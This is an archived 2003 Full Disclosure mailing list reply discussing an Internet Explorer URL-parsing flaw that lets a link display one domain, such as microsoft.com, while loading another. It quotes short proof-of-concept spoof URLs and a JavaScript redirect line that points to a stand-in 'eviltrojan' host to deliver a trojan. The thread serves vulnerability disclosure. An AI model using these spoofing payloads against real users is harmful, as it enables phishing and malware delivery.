Full Disclosure mailing list archives
Re: RE: FWD: Internet Explorer URL parsing vulnerability
From: S G Masood <sgmasood () yahoo com>
Date: Tue, 9 Dec 2003 11:00:51 -0800 (PST)
--- Exibar <exibar () thelair com> wrote:
my favorite will be this one that I'm sure will circulate: http://www.microsoft.com%01 () www linux org :-)
http://www.microsoft.com%01 () www linux org wont work until you unescape('http://www.microsoft.com%01 () www linux org');
----- Original Message ----- From: "S G Masood" <sgmasood () yahoo com> To: <full-disclosure () lists netsys com> Sent: Tuesday, December 09, 2003 1:22 PM Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerabilityLOL. This is so simple and dangerous, it almostmademe laugh and cry at the same time. Most of youwillrealise why...;D The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this monthwithlots of zombies falling for this simple technique.# POC ##########http://www.zapthedingbat.com/security/ex01/vun1.htm Dont be surprised if your latest download from http://www.microsoft.com turns out to be a trojan!
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadan
eviltrojanfromme.com);-- S.G.Masood Hyderabad, India PS: One more thing - no scripting required toexploit this.__________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter:http://lists.netsys.com/full-disclosure-charter.html
__________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S . f . Stover (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Jeremiah Cornelius (Dec 09)
- <Possible follow-ups>
- FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability S G Masood (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- RE: RE: FWD: Internet Explorer URL parsing vulnerability Chris S (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Michal Zalewski (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Nick FitzGerald (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 09)
- RE: Internet Explorer URL parsing vulnerability http-equiv () excite com (Dec 09)
- RE: FWD: Internet Explorer URL parsing vulnerability Julian HO Thean Swee (Dec 09)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability VeNoMouS (Dec 09)
(Thread continues...)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Clint Bodungen (Dec 09)
